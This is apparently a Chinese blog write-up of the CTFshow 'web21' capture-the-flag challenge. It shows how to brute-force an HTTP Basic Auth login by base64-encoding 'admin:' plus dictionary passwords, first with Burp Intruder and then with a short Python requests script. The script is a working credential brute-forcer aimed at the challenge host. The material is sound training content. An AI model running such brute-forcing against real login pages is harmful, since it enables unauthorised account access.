CTFshow 爆破 web21

最新推荐文章于 2024-07-23 23:28:02 发布
最新推荐文章于 2024-07-23 23:28:02 发布
阅读量253 收藏
点赞数
分类专栏: CTFshow 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/120913770
版权

根据提示

爆破什么的,都是基操

进去弹出表单,要求输入账号密码
在这里插入图片描述
通过bp抓包得到,发现Authorization 后面的是base64加密的字段
在这里插入图片描述
解密得到 用户名:密码
在这里插入图片描述
对admin:进行加密
在这里插入图片描述
用bp把请求数据包发送到Intruder模块,构造payload(第一个$前面的是admin:的base64加密)
在这里插入图片描述
加载题目给的字典(zip文件重命名1.zip,可以得到字典的txt文件),然后添加规则,将payload进行base64加密,并且把下方的url加密的勾去掉,开始爆破

在这里插入图片描述在这里插入图片描述
由于题库对请求速度做了限制,线程最高只能开到5,速度很慢,要耐心等待,找到长度不一样的,查看响应包,拿到flag
在这里插入图片描述
附上脚本

import requests
import time
import base64

url="http://5449841b-f207-4dfc-945f-45fa5dac968d.challenge.ctf.show/"

def bp(line):
    s=requests.session()

    header={
        'Authorization':'Basic YWRtaW46{}'.format(base64.b64encode(line.encode('utf-8')).decode('utf-8'))
    }

    res=s.get(url,headers=header)

    return res.text


with open("最新网站后台密码破解字典.txt") as q:
    passlist=q.readlines()
    q.close

for line in passlist:
    line=line.strip("\n")
    time.sleep(0.2)
    print(line)
    if "需要用户名和密码才能继续访问" not in bp(line):
        print("password is {}".format(line))
        break
Kradress
关注
专栏目录
CTF — 压缩包密码爆破
Liu_Bruce的博客
08-06 543
​ 在CTF比赛中,密码爆破压缩包(如ZIP或RAR文件)是一个常见的任务。针对ZIP压缩包的密码爆破主要是使用工具ARCHPR完成的。
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1098
ctfshow-web入门-爆破wp
CTFshow 爆破 web24
Kradress的博客
10-28 457
根据提示 爆个???? <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 13:26:39 # @Last Modified by: h1xa # @Last Modified time: 2020-09-03 13:53:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include("f
CTFshowweb21
qq_51324662的博客
05-11 631
关于CTFshow的web21题 这道题普遍的写法是用BURP suite抓包工具写的: 但是,身为一个代学生怎么会满足于抓包工具呢,于是,神奇的zzuctfer想到了自己可以用requests模块写一个脚本来处理这个暴力破解的方法: 1.首先用神奇的抓包工具抓一下包 #第一次笔者以为这个是用POST请求提交的表单,但是,通过反复的抓包,我发现了一个变量 Authorization这一栏,这个神奇的请求头的内容会变,并且大致观察一下发现它是base64编码的这时候,解码一下发现了这个结果: admin:
CTFSHOW爆破 WEB21~WEB28
y4615184的博客
05-13 481
温故知新,复盘当尝试不同方法,弄懂原理! WEB 21 直接一个登录界面,开BP,先输入admin/123456 ,抓包 发现GET包中的Authorization(授权)中有一段密文 ,像base64编码,试下解密 发现这里就是提交的账号密码,中间有个:,知道了格式和提交位置,开始爆破 先改为明文形式加变量符,选择cluster bomb模式,载入提供的字典,添加两条规则(末尾固定增加:,base64编码),取消payload encoding的√(避免特殊符号被自动转义).
CTFSHOW web入门——web21
m0_74093152的博客
02-21 310
CTFSHOWweb入门——web21
ctfshow 爆破 web21-web28
YkingH的博客
01-29 2503
爆破 爆破考察手段 burp intruder的使用 编写脚本寻找满足条件的解 伪随机 web21 burp抓包,发送到intruder模块,利用题中给出的脚本进行爆破,注意通过payload加工模块进行payload加工,采用base64编码。在返回的数据包中查找长度即可 web22 环境进不去,直接提交flag web23 利用给出的php脚本,进行进一步加工,爆破出满足条件的token <?php for($a=0;$a<10;$a++){ for($b=0;$b<10;$b
ctfshow-web入门-爆破web21-24)
HkD01L的博客
06-19 468
ctfshow,爆破,web21,web22,web23,web24,writeup,ctf
CTFshow 爆破 web23
Kradress的博客
10-28 222
根据提示 还爆破?这么多代码,告辞! 源码如下 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 11:43:51 # @Last Modified by: h1xa # @Last Modified time: 2020-09-03 11:56:11 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0);
CTFshow web入门爆破23
a861511690的博客
06-09 496
CTFshow web入门爆破23 #py -3.9 # -*- coding:utf-8 -*- import hashlib dic = '0123456789qazwsxedcrfvtgbyhnujmikolp' # md5 = hashlib.md5() # md5.update(dic) # ret=md5.hexdigest() # print(ret) for a in dic: #直接遍历所有的数字和字母的组合,几个数都行这里举两个数为例 for b in dic:
ctfshow爆破web21~28
qq_55233040的博客
07-23 2745
知识点总结 web21 基础爆破工具的使用 web22 域名爆破 web23 条件爆破 web24 随机数种子爆破 web25 伪随机数爆破 web26 数据库连接信息爆破 web27 信息收集+日期爆破 web28 目录爆破 目录web21web22web23web24web25web26web27web28 web21 题目提示:爆破什么的,都是基操 本题自带字典,因此答案肯定在此字典中 进入网站,是一个登陆界面 用户名输入admin,密码随便填个123a
ctfshow爆破web21
m0_62584974的博客
04-04 661
Web21爆破什么的,都是基操考察自定义迭代器 输入值后用bp抓包发送到测试器 输入的账户名和密码被base64加密了,用burp自带解密发现账户名和密码之间用冒号隔开了 记得 取消url编码 ...
ctfshow web入门 爆破web21题详解
m0_73860001的博客
07-09 460
5.点击上方的开始攻击,之后会弹出一个框,查看状态码为200的即爆破成功(之前我一直以为这个状态码是由小到大进行排序的,在这里卡了很多次,所以大家一定要查看完整】,你可以复制这个字符串进行base64解码之后登录,也可以点击【Response】查看flag。复制蓝色所框选的部分,点击上方【Decoder】菜单栏,将该字符串复制到框中,接着右侧点击【编码】-->【base64】可得下方该字符串解码所示结果,当然也可以去base64在线解密上解码该字符串。选项,可以发现上方【Intruder】变红,点击它。
《CTFshow-Web入门》03. Web 21~30
学习学习学习......
11-25 1566
用户名密码爆破、域名爆破、PHP 代码分析、PHP 伪随机数及其逆推、burpsuite 暴力破解、eval() 利用与正则绕过。
CTFshow爆破web21
最新发布
potatojiang的博客
07-23 155
从今天7.23开始学习爆破
CTFSHOW WEB入门——爆破
Chur的博客
09-16 1058
WEB入门——爆破 BP
ctfshow web入门 爆破
weixin_56023251的博客
07-13 533
bp抓包,设置爆破点,导入字典啥的设置好就开始爆破,字典很短很容易拿到flag在线工具 https://phpinfo.me/domain爆破一下ctf.show的子域名,可以看到有好几个子域名,挨个查看源码,在vip.ctf.show源码中找到flag法一 token被md5加密,第一个条件:它的第一位=第十四位=第十七位,第二个条件:(第一位+第十四位+第十七位)/第一位=第三十一位编写php代码对token进行爆破 phpstudy本地搭建环境访问php文件得到token值访问 ?token=
CTFshow——web入门——爆破
h_adam的博客
11-01 186
web入门——爆破web21web22 web21 题目 题解 用户名输admin 密码输123 抓包,发送给intruder,发现有个base解码 说明输入的被base加密了,我们可以添加前缀 因为被base64加密了,我们在这添加一个编码 取消勾选 字典用题目给的,开始爆破 web22 题目 题解 ...
CTFshow—web入门21-28(爆破
一个普普通通的博客
10-15 3599
文章目录WEB21WEB22WEB23WEB24WEB25WEB26WEB27WEB28 WEB21 先随意使用一个密码抓包尝试一下 base64解密后发现账号密码的形式为 账号:密码 根据提示我们使用题目所给字典爆破 构造payload,猜测账户名为admin,前半部分不用变,为后半部分迭代即可 导入所给字典 进行base64编码,切记不可为符号再编码,base64可能存在= attack 拿到flag 或者采用方式二 同样拿下 WEB22 子域名爆破,但是这题爆不出来,直接查看view
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值